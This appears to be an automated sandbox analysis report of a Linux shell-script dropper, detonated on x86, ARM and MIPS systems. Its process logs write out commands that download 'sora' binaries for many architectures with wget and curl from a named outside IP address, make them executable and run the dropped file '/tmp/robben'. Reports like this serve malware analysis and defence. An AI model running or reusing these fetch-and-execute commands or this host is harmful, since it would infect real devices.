Analysis Overview
SHA256
7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d
Threat Level: Shows suspicious behavior
The file 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh was found to show suspicious behavior.
Malicious Activity Summary
File and Directory Permissions Modification
Executes dropped EXE
Checks CPU configuration
Writes file to tmp directory
Reads runtime system information
System Network Configuration Discovery
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-10-18 02:04
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-10-18 02:04
Reported
2024-10-18 02:06
Platform
ubuntu1804-amd64-20240611-en
Max time kernel
2s
Max time network
128s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target | Count |
|---|---|---|---|---|
| N/A | N/A | /bin/chmod | N/A | 14 identical rows |
Executes dropped EXE
| Description | Indicator | Process | Target | Count |
|---|---|---|---|---|
| N/A | /tmp/robben | /tmp/robben | N/A | 14 identical rows |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | /bin/cat | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for modification | /tmp/robben | /tmp/7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh | N/A |
Processes
/tmp/7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh
[/tmp/7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.x86]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.x86]
/bin/cat
[cat sora.x86]
/bin/chmod
[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh config-err-CgvOrA netplan_7v52snic robben snap-private-tmp ssh-J4eYhaVHucOf systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-bolt.service-Z9x1ht systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-colord.service-jiD6Ry systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-ModemManager.service-djkTkT systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-resolved.service-HWFks7 systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-timedated.service-HKGii1]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.mips]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.mips]
/bin/cat
[cat sora.mips]
/bin/chmod
[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh config-err-CgvOrA netplan_7v52snic robben snap-private-tmp ssh-J4eYhaVHucOf systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-bolt.service-Z9x1ht systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-colord.service-jiD6Ry systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-ModemManager.service-djkTkT systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-resolved.service-HWFks7 systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-timedated.service-HKGii1]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.x86_64]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.x86_64]
/bin/cat
[cat sora.x86_64]
/bin/chmod
[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh config-err-CgvOrA netplan_7v52snic robben snap-private-tmp ssh-J4eYhaVHucOf systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-bolt.service-Z9x1ht systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-colord.service-jiD6Ry systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-ModemManager.service-djkTkT systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-resolved.service-HWFks7 systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-timedated.service-HKGii1]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.i468]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.i468]
/bin/cat
[cat sora.i468]
/bin/chmod
[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh config-err-CgvOrA netplan_7v52snic robben snap-private-tmp ssh-J4eYhaVHucOf systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-bolt.service-Z9x1ht systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-colord.service-jiD6Ry systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-ModemManager.service-djkTkT systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-resolved.service-HWFks7 systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-timedated.service-HKGii1]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.i686]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.i686]
/bin/cat
[cat sora.i686]
/bin/chmod
[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh config-err-CgvOrA netplan_7v52snic robben snap-private-tmp ssh-J4eYhaVHucOf systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-bolt.service-Z9x1ht systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-colord.service-jiD6Ry systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-ModemManager.service-djkTkT systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-resolved.service-HWFks7 systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-timedated.service-HKGii1]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.mpsl]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.mpsl]
/bin/cat
[cat sora.mpsl]
/bin/chmod
[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh config-err-CgvOrA netplan_7v52snic robben snap-private-tmp ssh-J4eYhaVHucOf systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-bolt.service-Z9x1ht systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-colord.service-jiD6Ry systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-ModemManager.service-djkTkT systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-resolved.service-HWFks7 systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-timedated.service-HKGii1]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.arm4]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.arm4]
/bin/cat
[cat sora.arm4]
/bin/chmod
[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh config-err-CgvOrA netplan_7v52snic robben snap-private-tmp ssh-J4eYhaVHucOf systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-bolt.service-Z9x1ht systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-colord.service-jiD6Ry systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-ModemManager.service-djkTkT systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-resolved.service-HWFks7 systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-timedated.service-HKGii1]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.arm5]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.arm5]
/bin/cat
[cat sora.arm5]
/bin/chmod
[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh config-err-CgvOrA netplan_7v52snic robben snap-private-tmp ssh-J4eYhaVHucOf systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-bolt.service-Z9x1ht systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-colord.service-jiD6Ry systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-ModemManager.service-djkTkT systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-resolved.service-HWFks7 systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-timedated.service-HKGii1]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.arm6]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.arm6]
/bin/cat
[cat sora.arm6]
/bin/chmod
[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh config-err-CgvOrA netplan_7v52snic robben snap-private-tmp ssh-J4eYhaVHucOf systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-bolt.service-Z9x1ht systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-colord.service-jiD6Ry systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-ModemManager.service-djkTkT systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-resolved.service-HWFks7 systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-timedated.service-HKGii1]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.arm7]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.arm7]
/bin/cat
[cat sora.arm7]
/bin/chmod
[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh config-err-CgvOrA netplan_7v52snic robben snap-private-tmp ssh-J4eYhaVHucOf systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-bolt.service-Z9x1ht systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-colord.service-jiD6Ry systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-ModemManager.service-djkTkT systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-resolved.service-HWFks7 systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-timedated.service-HKGii1]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.ppc]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.ppc]
/bin/cat
[cat sora.ppc]
/bin/chmod
[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh config-err-CgvOrA netplan_7v52snic robben snap-private-tmp ssh-J4eYhaVHucOf systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-bolt.service-Z9x1ht systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-colord.service-jiD6Ry systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-ModemManager.service-djkTkT systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-resolved.service-HWFks7 systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-timedated.service-HKGii1]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.ppc440fp]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.ppc440fp]
/bin/cat
[cat sora.ppc440fp]
/bin/chmod
[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh config-err-CgvOrA netplan_7v52snic robben snap-private-tmp ssh-J4eYhaVHucOf systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-bolt.service-Z9x1ht systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-colord.service-jiD6Ry systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-ModemManager.service-djkTkT systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-resolved.service-HWFks7 systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-timedated.service-HKGii1]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.m68k]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.m68k]
/bin/cat
[cat sora.m68k]
/bin/chmod
[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh config-err-CgvOrA netplan_7v52snic robben snap-private-tmp ssh-J4eYhaVHucOf systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-bolt.service-Z9x1ht systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-colord.service-jiD6Ry systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-ModemManager.service-djkTkT systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-resolved.service-HWFks7 systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-timedated.service-HKGii1]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.sh4]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.sh4]
/bin/cat
[cat sora.sh4]
/bin/chmod
[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh config-err-CgvOrA netplan_7v52snic robben snap-private-tmp ssh-J4eYhaVHucOf systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-bolt.service-Z9x1ht systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-colord.service-jiD6Ry systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-ModemManager.service-djkTkT systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-resolved.service-HWFks7 systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-timedated.service-HKGii1]
/tmp/robben
[./robben Payload]
Network
| Country | Destination | Domain | Proto | Count |
|---|---|---|---|---|
| N/A | 224.0.0.251:5353 | | udp | 1 |
| NL | 93.123.85.141:80 | | tcp | 16 identical rows |
| US | 151.101.193.91:443 | | tcp | 1 |
| GB | 195.181.164.14:443 | | tcp | 1 |
| NL | 93.123.85.141:80 | | tcp | 12 identical rows |
| GB | 185.125.188.62:443 | | tcp | 2 identical rows |
Files
Analysis: behavioral2
Detonation Overview
Submitted
2024-10-18 02:04
Reported
2024-10-18 02:06
Platform
debian9-armhf-20240729-en
Max time kernel
10s
Max time network
11s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target | Count |
|---|---|---|---|---|
| N/A | N/A | /bin/chmod | N/A | 14 identical rows |
Executes dropped EXE
| Description | Indicator | Process | Target | Count |
|---|---|---|---|---|
| N/A | /tmp/robben | /tmp/robben | N/A | 14 identical rows |
Checks CPU configuration
| Description | Indicator | Process | Target | Count |
|---|---|---|---|---|
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A | 14 identical rows |
Reads runtime system information
| Description | Indicator | Process | Target | Count |
|---|---|---|---|---|
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A | 14 identical rows |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A | 14 identical rows |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/cat | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for modification | /tmp/robben | /tmp/7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh | N/A |
Processes
/tmp/7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh
[/tmp/7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.x86]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.x86]
/bin/cat
[cat sora.x86]
/bin/chmod
[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben systemd-private-3b148e8f820244b985fb9e6bdebf8e5b-systemd-timedated.service-VIeKBe]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.mips]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.mips]
/bin/cat
[cat sora.mips]
/bin/chmod
[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben systemd-private-3b148e8f820244b985fb9e6bdebf8e5b-systemd-timedated.service-VIeKBe]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.x86_64]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.x86_64]
/bin/cat
[cat sora.x86_64]
/bin/chmod
[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben systemd-private-3b148e8f820244b985fb9e6bdebf8e5b-systemd-timedated.service-VIeKBe]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.i468]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.i468]
/bin/cat
[cat sora.i468]
/bin/chmod
[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben systemd-private-3b148e8f820244b985fb9e6bdebf8e5b-systemd-timedated.service-VIeKBe]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.i686]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.i686]
/bin/cat
[cat sora.i686]
/bin/chmod
[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben systemd-private-3b148e8f820244b985fb9e6bdebf8e5b-systemd-timedated.service-VIeKBe]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.mpsl]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.mpsl]
/bin/cat
[cat sora.mpsl]
/bin/chmod
[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben systemd-private-3b148e8f820244b985fb9e6bdebf8e5b-systemd-timedated.service-VIeKBe]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.arm4]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.arm4]
/bin/cat
[cat sora.arm4]
/bin/chmod
[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben systemd-private-3b148e8f820244b985fb9e6bdebf8e5b-systemd-timedated.service-VIeKBe]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.arm5]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.arm5]
/bin/cat
[cat sora.arm5]
/bin/chmod
[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben systemd-private-3b148e8f820244b985fb9e6bdebf8e5b-systemd-timedated.service-VIeKBe]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.arm6]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.arm6]
/bin/cat
[cat sora.arm6]
/bin/chmod
[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben systemd-private-3b148e8f820244b985fb9e6bdebf8e5b-systemd-timedated.service-VIeKBe]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.arm7]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.arm7]
/bin/cat
[cat sora.arm7]
/bin/chmod
[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben systemd-private-3b148e8f820244b985fb9e6bdebf8e5b-systemd-timedated.service-VIeKBe]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.ppc]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.ppc]
/bin/cat
[cat sora.ppc]
/bin/chmod
[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben systemd-private-3b148e8f820244b985fb9e6bdebf8e5b-systemd-timedated.service-VIeKBe]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.ppc440fp]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.ppc440fp]
/bin/cat
[cat sora.ppc440fp]
/bin/chmod
[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben systemd-private-3b148e8f820244b985fb9e6bdebf8e5b-systemd-timedated.service-VIeKBe]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.m68k]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.m68k]
/bin/cat
[cat sora.m68k]
/bin/chmod
[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben systemd-private-3b148e8f820244b985fb9e6bdebf8e5b-systemd-timedated.service-VIeKBe]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.sh4]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.sh4]
/bin/cat
[cat sora.sh4]
/bin/chmod
[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben systemd-private-3b148e8f820244b985fb9e6bdebf8e5b-systemd-timedated.service-VIeKBe]
/tmp/robben
[./robben Payload]
Network
| Country | Destination | Domain | Proto | Count |
|---|---|---|---|---|
| NL | 93.123.85.141:80 | | tcp | 28 identical rows |
Files
Analysis: behavioral3
Detonation Overview
Submitted
2024-10-18 02:04
Reported
2024-10-18 02:06
Platform
debian9-mipsbe-20240611-en
Max time kernel
85s
Max time network
88s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target | Count |
|---|---|---|---|---|
| N/A | N/A | /bin/chmod | N/A | 14 identical rows |
Executes dropped EXE
| Description | Indicator | Process | Target | Count |
|---|---|---|---|---|
| N/A | /tmp/robben | /tmp/robben | N/A | 14 identical rows |
Reads runtime system information
| Description | Indicator | Process | Target | Count |
|---|---|---|---|---|
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A | 14 identical rows |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/cat | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for modification | /tmp/robben | /tmp/7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh | N/A |
Processes
/tmp/7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh
[/tmp/7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.x86]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.x86]
/bin/cat
[cat sora.x86]
/bin/chmod
[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben systemd-private-a23af2012a9c4325be1adc61f96c31ce-systemd-timedated.service-FpU7jx]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.mips]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.mips]
/bin/cat
[cat sora.mips]
/bin/chmod
[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben systemd-private-a23af2012a9c4325be1adc61f96c31ce-systemd-timedated.service-FpU7jx]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.x86_64]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.x86_64]
/bin/cat
[cat sora.x86_64]
/bin/chmod
[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben systemd-private-a23af2012a9c4325be1adc61f96c31ce-systemd-timedated.service-FpU7jx]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.i468]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.i468]
/bin/cat
[cat sora.i468]
/bin/chmod
[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben systemd-private-a23af2012a9c4325be1adc61f96c31ce-systemd-timedated.service-FpU7jx]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.i686]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.i686]
/bin/cat
[cat sora.i686]
/bin/chmod
[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.mpsl]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.mpsl]
/bin/cat
[cat sora.mpsl]
/bin/chmod
[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.arm4]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.arm4]
/bin/cat
[cat sora.arm4]
/bin/chmod
[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.arm5]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.arm5]
/bin/cat
[cat sora.arm5]
/bin/chmod
[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.arm6]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.arm6]
/bin/cat
[cat sora.arm6]
/bin/chmod
[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.arm7]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.arm7]
/bin/cat
[cat sora.arm7]
/bin/chmod
[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.ppc]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.ppc]
/bin/cat
[cat sora.ppc]
/bin/chmod
[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.ppc440fp]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.ppc440fp]
/bin/cat
[cat sora.ppc440fp]
/bin/chmod
[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.m68k]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.m68k]
/bin/cat
[cat sora.m68k]
/bin/chmod
[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.sh4]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.sh4]
/bin/cat
[cat sora.sh4]
/bin/chmod
[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben]
/tmp/robben
[./robben Payload]
Network
| Country | Destination | Domain | Proto |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
